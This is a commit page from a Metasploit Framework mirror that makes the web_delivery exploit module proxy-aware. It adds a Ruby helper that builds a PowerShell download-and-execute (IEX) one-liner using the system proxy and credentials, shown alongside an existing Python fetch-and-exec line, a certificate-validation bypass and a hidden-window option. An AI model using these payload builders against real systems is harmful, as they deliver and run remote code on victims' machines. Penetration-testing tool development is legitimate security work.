dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Make web_delivery proxy aware

This commit is contained in:
Meatballs 2015-09-23 20:45:51 +01:00
parent 44fa188e71
commit 66c9222968
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
3 changed files with 27 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
lib/rex/powershell/psh_methods.rb
View File

@ -72,6 +72,22 @@ module Powershell
def self.ignore_ssl_certificate def self.ignore_ssl_certificate
'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};' '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
end end
#
# Use the default system web proxy and credentials to download a URL
# as a string and execute the contents as PowerShell
#
# @param url [String] string to download
#
# @return [String] PowerShell code to download a URL
def self.proxy_aware_download_and_exec_string(url)
var = Rex::Text.rand_text_alpha(1)
cmd = "$#{var}=new-object net.webclient;"
cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
cmd << "IEX $#{var}.downloadstring('#{url}');"
cmd
end
end end
end end
end end

3
modules/exploits/multi/script/web_delivery.rb
View File

@ -89,7 +89,8 @@ class Metasploit3 < Msf::Exploit::Remote
print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
when 'PSH' when 'PSH'
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{url}'))" download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
download_and_run = "#{ignore_cert}#{download_string}"
print_line generate_psh_command_line( print_line generate_psh_command_line(
noprofile: true, noprofile: true,
windowstyle: 'hidden', windowstyle: 'hidden',

9
spec/lib/rex/powershell/psh_methods_spec.rb
View File

@ -40,5 +40,14 @@ describe Rex::Powershell::PshMethods do
script.include?('Get-QADComputer').should be_truthy script.include?('Get-QADComputer').should be_truthy
end end
end end
describe "::proxy_aware_download_and_exec_string" do
it 'should return some powershell' do
url = 'http://blah'
script = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
script.should be
script.include?(url).should be_truthy
script.downcase.include?('downloadstring').should be_truthy
end
end
end end